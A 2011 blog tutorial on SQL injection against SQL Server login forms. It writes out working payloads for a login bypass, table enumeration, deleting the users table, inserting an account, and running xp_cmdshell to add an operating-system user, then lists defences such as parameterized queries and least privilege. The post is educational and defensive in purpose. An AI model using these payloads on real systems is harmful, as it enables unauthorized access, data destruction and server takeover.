Friday, December 23, 2011

SQL Injection

This post is intended for learning purpose in a topic of PenTest and how to avoid bad user input to protect your site, system from begin misused.
SQL Injection:
SQL Injection is most popular SQL vulnerability that used to attack SQL database, this attack may affect the hosting operating system. When user gains access to your database, he tries to escalate his privilege to gain administration permission.
If the user gains administration permission on your database management system, then he will try to execute systems command that allowed by your DBMS and then try to create/escalate his user permission and get administration permission on your server, think about what he can do with administration permission on your server … simply he own your server not you.
In this post I will introduce you through basic SQL Injection concepts and I will makes some hands on to show you how it is simple to do it. (Notice this post for how to prevent yourself from those types of attack no to try it to gain access on others system, try it on your own systems or authorized system)
Conceder those queries (SQL SERVER):
Select * From users WHERE user name = ‘user’ AND password = ‘password’;
When this query executed on SSMS it will return all user data when user name is user and password is password, but if we have web page and want to authenticate users we will ask any user to provide us with those information.
If we use ASP.Net for example the Query String will be as:
user textbox component to enter username, password textbox component to enter password.
QueryString = “SELECT * FROM users WHERE username = ‘ ” + user.text + “ ‘ AND password = ‘ “ + password.text + “ ’ “.
When user enter valid input (e.g username = user, password = password) then the query send to SQL server database will be
SELECT * FROM users WHERE username = ‘user’ AND password = ‘password’
BUT if user enter this information (‘ OR 1 = 1; --, anything) then the query will be:
SELECT * FROM users WHERE username = ‘ ‘ OR 1 = 1 ; -- AND password = ‘anything’;
Then the user will get access to our database because the system will return all user table (Consider always 1 = 1 (this is the trick)) and the query will escape the rest of statement because it is commented using ( -- those dashes used as for comments in SQL Server ) .
Consider those examples where user not only access the system but he do malicious things like delete, update or even insert data.
IF user execute these query he will get all tables on the database
SELECT*FROMinformation_schema.tables   (SQL Server 2008)

SELECT*FROMsysobjectsWHERE xtype='U'  (SQL Server 2000)
When he get a list of all user table in the database he can do anything
DELETE all user from user table (That means no one (from whom on user table) will access the system the business will stop)
If he enter username = ‘ OR 1 = 1; Delete users --
Password = anything
SELECT * FROM users WHERE username = ‘ ‘ OR 1 = 1 ; Delete users -- AND password = ‘anything’;
Now the user table is empty.
He can insert new user
Username = ‘ OR 1 = 1; Insert into users (username, password) values (‘new’, ‘new’); --
Password = anything
SELECT * FROM users WHERE username = ‘ ‘ OR 1 = 1 ; -- AND password = ‘anything’;
And many more, to see more watch demo on and
Think about those queries:
you can pass operating system commands using master.dbo.xp_cmdshell
username = ‘ OR 1 = 1; EXEC master.dbo.xp_cmdshell ‘net user (newuser) / ADD’ --;
password = anthing.
Xp_cmdshell is disable by default (we will talk about this later).
Now you have user on the local system (what else that is amazing).
You can shut down database any more.
·         Disable any feature that provided by your DBMS you didn’t use. e.g. xp_cmdshell in the previous example you see how it is malicious. You DBMS must be will configured, attackers always exploits you by using your bad configuration.
·         Least privilege, every user in your database must provide a minimum permission to complete his tasks. If your user is a reporting user he must gain read permission so the above exploits for delete, insert, and update will not happen.
·         Validate user input, this is very important you have to check if your user enter valid or invalid input and take action according to the input.
·         Always, if there is an error occurred you must provide custom error message, do not let SQL server provide error messages for your end user he may use this error message badly. Try … catch exception always help.
·         Use database abstraction (refer to my post http://elmozamil.blogspot.comon about database), you must try to use view level if it possible so the users have no access on database objects except the specified views.
·         Use stored procedure and give the user permission on store procedure to update, and insert, delete, and select. I think you must use stored procedure for every database manipulation when you ask users about input. Stored procedure use parameters and it manipulate those parameter as the data type declared, and it limit the user will the size of the parameter. If the user name must be 10 character the SP will get the first 10 character if users insert more.
·         Use parameterized SQL command.
·         Always know Google is your best friend, Google and you will get more.
I hope you enjoy.
In the demo I will exploit SQL server and MYSQL databases and gain permission on the hosting operating system.
Written by: Elmozamil Elamir Hamid

No comments:

Post a Comment